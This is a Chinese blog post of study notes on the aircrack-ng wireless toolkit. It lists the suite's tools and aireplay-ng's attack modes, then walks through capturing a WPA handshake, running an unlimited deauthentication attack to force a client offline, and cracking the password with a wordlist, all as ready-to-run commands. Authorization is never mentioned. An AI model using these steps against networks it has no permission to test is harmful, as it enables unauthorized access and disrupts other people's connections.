aircrack-ng 工具集学习
一、aircrack-ng简介
aircrack-ng是Aircrack项目的一个分支。是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,
WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持监听模式的无线网卡上(设备列表请参阅其官方网站)并嗅探802.11a,802.11b,
802.11g的数据。该程序可运行在Linux和Windows上。
Name
|
Description
|
---|---|
aircrack-ng
|
|
airdecap-ng
|
|
airmon-ng
|
将网卡设定为监听模式
|
aireplay-ng
|
|
airodump-ng
|
数据包嗅探:将无线网络数据输送到PCAP或IVS文件并显示网络信息
|
airtun-ng
|
创建虚拟管道
|
airolib-ng
|
保存、管理ESSID密码列表
|
packetforge-ng
|
创建数据包注入用的加密包。
|
Tools
|
混合、转换工具
|
airbase-ng
|
软件模拟AP
|
airdecloak-ng
|
消除pcap文件中的WEP加密
|
airdriver-ng
|
无线设备驱动管理工具
|
airolib-ng
|
保存、管理ESSID密码列表,计算对应的密钥
|
airserv-ng
|
允许不同的进程访问无线网卡
|
buddy-ng
|
easside-ng的文件描述
|
easside-ng
|
|
tkiptun-ng
|
WPA/TKIP攻击
|
wesside-ng
|
自动破解WEP密钥
|
二、aircrack-ng各个组件介绍
1. aireplay-ng: 是aircrack-ng套件里的一款抓包工具,aireplay-ng 中集成了10种攻击方式,分别是:
Attack 0: Deauthentication 解除认证
Attack 1: Fake authentication 伪造身份验证
Attack 2: Interactive packet replay 交互式数据包重播
Attack 3: ARP request replay attack ARP请求重播攻击
Attack 4: KoreK chopchop attack KoreK 斩杀攻击
Attack 5: Fragmentation attack 碎片攻击
Attack 6: Cafe-latte attack 咖啡拿铁攻击
Attack 7: Client-oriented fragmentation attack 面向客户的分片攻击
Attack 8: WPA Migration Mode WPA 迁移模式
Attack 9: Injection test 注射试验
2. airmon-ng: 使用airmon-ng查看你无线网卡。
# sudo airmon-ng 查看网卡信息
# airmon-ng start wlan0 将网卡设置为监听模式(混杂模式)
# airmon-ng stop wlan0 将网卡从监听模式(混杂模式)中退出
3. airodump-ng:使用airodump-ng扫描信号
# sudo airodump-ng wlan0mon airodump-ng <你的monitor模式的网卡>
打印的信息中:
BSSID是AP端的MAC地址
PWR是信号强度,数字越小越好
#Data是对应的路由器的在线数据吞吐量,数字越大,数据上传量越大。
CH是对应路由器的所在频道
ESSID是对应路由器的名称
# sudo airodump-ng -c 6 -w Desktop/handshake --bssid C0:00:00:00:00:48 wlan0mon 使用airodump-ng监听指定目标频道。
注:airodump-ng -c <AP的频道> -w <抓取握手包的存放位置> --bssid <AP的MAC地址> <你的处于monitor模式的网卡名称>
在你的抓取握手包的存放目录会生成4个文件:
handshake-01.cap 握手包文件的拓展名为
handshake-01.csv
handshake-01.kismet.csv
handshake-01.kismet.netxml
4. aireplay-ng: 使用aireplay-ng进行解除认证攻击模式.
一个合法的客户端要连上AP要经历四次握手,四次握手的全过程如下:
1.你请求连AP
2.AP发一个数据包给你
3.你将收到的数据包用wpa密钥加密,然后发给AP
4.AP用自己保存的wpa密钥加密相同数据包,然后和你发给他的比较,如果相同,就发准许接入的许可。
我们所说的抓握手包,是指抓AP发给合法客户的数据包,和合法客户端加密后发给AP的数据包。所以我们就抓这两个包,当我们有了明文和密文,就可以破解出密钥。
保持上一个terminal窗口的运行状态,打开一个新的terminal,然后:
# sudo aireplay-ng -0 0 -a C0:00:00:00:00:48 -c 18:00:00:00:00:88 wlan0mon
注:aireplay-ng -<攻击模式,我们这里使用解除认证攻击(0)> [攻击次数,0为无限攻击] -a <AP端的MAC地址> -c <客户端端的MAC地址> <你的处于monitor模式的网卡>
这里使用的是解除认证攻击模式,给客户端无限发送测试包使其下线。当你获取到握手包时,可以使用快捷重点内容键Ctrl + C 停止发送测试包。
5. aircrack-ng: 使用字典进行破解
# sudo airmon-ng stop wlan0mon 关闭监听模式。
# sudo aircrack-ng -w Desktop/wordlist.txt Desktop/handshake-01.cap 使用字典进行暴力破解。
注:aircrack-ng -w <字典路径名> <握手包路径名>
破解速度取决你CPU的核心数和速率。当密码破解成功时,会显示”KEY FOUND!”字样,中括号为AP端的密码。
参考:
https://blog.csdn.net/tonyzhejiang/article/details/72152512
http://www.aircrack-ng.org/# aircrack-ng工具包下载路径
http://www.voidcn.com/blog/king_of_fighter/article/p-2018690.html
posted on 2018-12-08 11:52 Hello-World3 阅读(1138) 评论(0) 编辑 收藏 举报